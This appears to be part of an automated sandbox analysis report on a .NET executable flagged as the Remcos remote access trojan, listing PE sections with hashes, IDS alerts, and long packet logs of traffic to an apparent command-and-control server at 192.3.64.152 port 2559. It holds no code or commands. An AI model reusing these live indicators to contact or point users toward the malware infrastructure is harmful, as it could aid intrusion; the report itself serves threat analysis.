.text | 0x2000 | 0xf6714 | 0xf6800 | add3398b705c7b715e821356212bba14 | False | 0.9463108519269777 | data | 7.8714607770183616 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xfa000 | 0x59c | 0x600 | 9788dc16d4ed64711268f0be9f984c9c | False | 0.4212239583333333 | data | 4.071783703727078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfc000 | 0xc | 0x200 | 02b0be8bc7a4ea81571bba866666225a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xfa090 | 0x30c | data | | | 0.43846153846153846
RT_MANIFEST | 0xfa3ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T18:25:40.472495+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49735 | 192.3.64.152 | 2559 | TCP
2024-12-05T18:25:43.074908+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49736 | 178.237.33.50 | 80 | TCP
2024-12-05T18:25:54.159943+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49741 | 192.3.64.152 | 2559 | TCP
2024-12-05T18:25:54.331790+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49742 | 192.3.64.152 | 2559 | TCP
2024-12-05T18:26:00.831798+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49743 | 192.3.64.152 | 2559 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                              Dec 5, 2024 18:25:57.952740908 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.952769041 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.952967882 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953083992 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953113079 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953213930 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953243017 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953373909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953463078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953491926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953541994 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:57.953856945 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.410358906 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:58.530540943 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.789299965 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.831787109 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:58.868508101 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:58.870215893 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:58.988392115 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988435984 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988549948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988579035 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988637924 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988666058 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988733053 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988760948 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988822937 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988851070 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988900900 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988928080 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988961935 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.988990068 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990108967 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990135908 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990168095 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990216017 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990370989 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990398884 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990514040 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990562916 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990631104 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:58.990681887 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.419265985 CET255949735192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.420377016 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:59.425671101 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:59.472332954 CET497352559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:59.540432930 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.540545940 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:59.544091940 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:59.547261000 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.667712927 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.808373928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.860444069 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:59.862062931 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:25:59.981429100 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981458902 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981563091 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981581926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981708050 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981719017 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981806040 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981988907 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982000113 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982033968 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982214928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982235909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982285023 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982295036 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982988119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983189106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983198881 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983216047 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983349085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983474016 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983484030 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983493090 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983701944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983711958 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.441432953 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.564940929 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.779536963 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.823219061 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.831798077 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.876646042 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.878211975 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.996984959 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997020960 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997056007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997153044 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997164011 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997174025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997183084 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997194052 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997253895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997303009 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997313976 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997391939 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997487068 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997497082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998132944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998164892 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998298883 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998308897 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998318911 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998374939 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998497963 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998603106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998613119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998671055 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.008358002 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.016550064 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.137597084 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.137927055 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.257831097 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.457187891 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.536941051 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537113905 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537216902 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537220001 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.537667990 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537681103 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537727118 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.538464069 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.538485050 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.538535118 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.539289951 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.541897058 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.545644999 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.545890093 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.545938015 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.554264069 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.554461002 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.554519892 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.577997923 CET255949741192.3.64.152192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 18:26:01.657113075 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.657375097 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.657499075 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.728771925 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.728935003 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.728991032 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.731121063 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.731378078 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.731920004 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.739218950 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.739634991 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.739700079 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.745347023 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.745503902 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.745624065 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.753375053 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.753554106 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.753627062 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.761409044 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.761610985 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.764944077 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.769407034 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.769617081 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.769687891 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.777404070 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.777656078 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.780014992 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.785661936 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.786411047 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.786497116 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.793425083 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.793616056 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.793675900 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.801481009 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.801728964 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.801811934 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.808516979 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.808696032 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.808748960 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.815464020 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.843158007 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.863050938 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.894081116 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.896099091 CET | 49742 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.945306063 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.945450068 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.945540905 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.947422028 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.947602034 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.947669029 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.951770067 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.951984882 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.952039003 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.956202984 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.956443071 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.956523895 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.960675001 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.960870028 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.960916042 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.965042114 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.965228081 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.965281010 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.969542980 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.969737053 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.969798088 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.973845959 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.974047899 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.974101067 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.978307962 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.978493929 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.978554964 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.982713938 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.982891083 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.982947111 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.987104893 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.987306118 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.987363100 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.991563082 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.991786957 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.991842031 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:01.995959997 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.996166945 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:01.996221066 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.000382900 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.000637054 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.000698090 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.004815102 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.005011082 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.005049944 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.009226084 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.009388924 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.009434938 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.013797045 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014022112 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014072895 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.014348984 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014359951 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014374018 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014383078 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014401913 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014410973 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014420033 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014435053 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014477015 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014527082 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014537096 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014678001 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014688969 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.014707088 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016122103 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016145945 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016247034 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016272068 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016398907 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016408920 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016508102 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016560078 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016596079 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.016695976 CET | 2559 | 49742 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.018013954 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.018208981 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.018268108 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.022459030 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.022649050 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.022706032 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.026804924 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.027209997 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.027266979 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.031291962 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.031588078 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.031637907 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.035737991 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.036010027 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.036072016 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.040110111 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.040344954 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.040402889 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
Dec 5, 2024 18:26:02.067380905 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.067574978 CET | 2559 | 49743 | 192.3.64.152 | 192.168.2.4
Dec 5, 2024 18:26:02.067627907 CET | 49743 | 2559 | 192.168.2.4 | 192.3.64.152
